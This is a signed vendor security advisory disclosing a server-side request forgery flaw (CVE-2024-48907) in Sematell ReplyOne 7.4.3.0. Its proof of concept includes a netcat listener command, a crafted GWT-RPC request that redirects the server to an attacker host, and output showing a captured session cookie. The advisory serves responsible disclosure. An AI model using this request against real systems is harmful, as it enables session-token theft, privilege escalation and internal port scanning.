-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 Advisory ID: SYSS-2024-083 Product: ReplyOne Manufacturer: Sematell GmbH Affected Version(s): 7.4.3.0 Tested Version(s): 7.4.3.0 Vulnerability Type: Server-Side Request Forgery (CWE-918) Risk Level: Medium Solution Status: Fixed Manufacturer Notification: 2024-09-23 Public Disclosure: 2025-04-29 CVE Reference: CVE-2024-48907 Author of Advisory: Andreas Grasser, SySS GmbH ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Overview: ReplyOne is a customer response platform for categorizing and automatically replying to incoming e-mails. It consists of a web server, an application server and client software. The manufacturer describes the product as a "sophisticated customer support software [that] offers precise categorization and seamless integration into your existing systems." (see [1]). Due to a server-side request forgery (SSRF) vulnerability, low-privileged users can obtain an access token for the back-end server and further escalate their privileges. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Vulnerability Details: The client-server communication of the application occurs through Google Web Toolkit Remote Procedure Calls (GWT RPCs), many of the requests containing the URL of a back-end server endpoint. Some of these endpoints are vulnerable to SSRF attacks which allow an attacker to let the web server connect to an arbitrary host instead of the application server. This vulnerability can be used in different malicious ways: - Bypass of the web server: The web server communicates with the application server using a "MM_SESSION" cookie. This cookie can be obtained by an attacker, who then can use it to directly authenticate against the application server. Although the cookie is associated with the attacker's user account, possession of the cookie allows the attacker to bypass any checks performed by the web server. - Internal port scan: The web server responds differently if a connection to the specified TCP port can be established. An attacker could use this behavior to conduct a port scan from within the server network. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Proof of Concept (PoC): To reproduce this finding, a netcat listener has to be started on a port of the attacker system, for example on port 80: $ nc -lvnp 80 listening on [any] 80 ... One endpoint which is vulnerable to the SSRF is the "listPermissions" endpoint. The following request forces the web server to connect to the attacker's system. The URL of the application server was replaced by the URL http://:. POST /desk/AR/user HTTP/1.1 Host: Cookie: JSESSIONID=########################; Content-Length: 256 X-Gwt-Permutation: ################################ Content-Type: text/x-gwt-rpc; charset=UTF-8 7|0|6|https:///desk/AR/|################################|com.attensity.respond.client.services.UserService|listPermissions|com.attensity.respond.shared.common.URIString/1588124183|http://:/rest/sc/151|1|2|3|4|1|5|5|6| The listener immediately shows an incoming connection from the web server: % nc -lvnp 80 [...] connect to [] from (UNKNOWN) [] 53858 GET /rest/sc/151/permission/all?class= HTTP/1.1 Cookie: $Version=1;MM_SESSION=########-####-4###-####-############::ReplyDeskWeb Accept: application/json [...] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclosure Timeline: 2024-09-10: Vulnerability discovered 2024-09-23: Vulnerability reported to manufacturer 2024-09-30: Reported vulnerabilities again as the vendor did not respond to the first e-mail 2024-10-31: Asked the manufacturer for updates on the planned fixes as the vendor did not respond to the first e-mails 2024-11-04: Manufacturer disagreed with proposed release schedule 2024-11-05: Proposed alternative release schedule 2025-03-03: Asked the vendor for updates 2025-04-16: Proposed release schedule as vendor did not respond to the previous e-mail 2025-04-29: Public release of security advisory ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ References: [1] Product website for ReplyOne https://www.sematell.com/en/product/features-3/ [2] SySS Security Advisory SYSS-2024-083 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2024-083.txt [3] SySS Responsible Disclosure Policy https://www.syss.de/en/responsible-disclosure-policy ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Credits: This security vulnerability was found by Andreas Grasser of SySS GmbH. E-Mail: andreas.grasser@syss.de Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Andreas_Grasser.asc Key ID: 0xEBF139DB998B143B Key Fingerprint: 2EDD 9E86 636E D24A ED7E 3A8A EBF1 39DB 998B 143B ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclaimer: The information provided in this security advisory is provided "as is" and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible. The latest version of this security advisory is available on the SySS Web site. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Copyright: Creative Commons - Attribution (by) - Version 3.0 URL: https://creativecommons.org/licenses/by/3.0/deed.en -----BEGIN PGP SIGNATURE----- iQJMBAEBCgA2FiEELt2ehmNu0krtfjqK6/E525mLFDsFAmgJ2/MYHGFuZHJlYXMu Z3Jhc3NlckBzeXNzLmRlAAoJEOvxOduZixQ7gbQP/iV9cUQ3CLMJ9Ss3Ov5I9Ft2 0WlrdwEBttTsrCNAS0n3ic1pJdAvJyq5VebbLga2ARt8BwYPIyNwEEQCxFqoXiqw p5JXTmgnujrWmArxD0RKHNRD++pd+5SsmxBUaFSVGaZ07tkfdFwbxhteZ1JUE+qK dQ3bCOt9hmLrT13+RRrj8Pr7u+7fGYJtfcn+N7K3L85SjKnNQj7mP4uqKEZmAz5V wBUUIYv/Zbx5o0VZhDgULUnPf1DCSJzIDFwnwgS23VLKRr8KCjBgFqt8evE0r7nc cSv9xZp6jg6Mj5J1g8ns24XSsDPPFs8RH+JFNJYQuflRXhgD5h8REOnoGmDR+Xrk sVtdxjYW4IktAtUXwRc1uB8NzADntRP5Wmy+axtLKERyOpKrz7KK1vFWxOnejCFB RVO1mwQRDLAhcgOe4qWFQ3QFztP1zY1Cq+CYhL3YsxJVaIxuSWCf7rKkrbdmLFRX JNBz4xv9ATmyibbu1ydKUAN66Af1Wl62/ZzYjDvVajoUUigNaK7tTnSVUOcou36C vrTv7OepUuvRgCNlvzjp8NTv8ZDmKrPYjS9dQH2CS+YkJDCqlV1M8rHSiBAqLV8J IdTCa+2bPbtOu1D/1/sKBKU9zPF8qkNXGJle7e326wsDF669cy32BR20idP9EhIt bZ7CVUAPhxcGcTSTpIWN =ZP5y -----END PGP SIGNATURE-----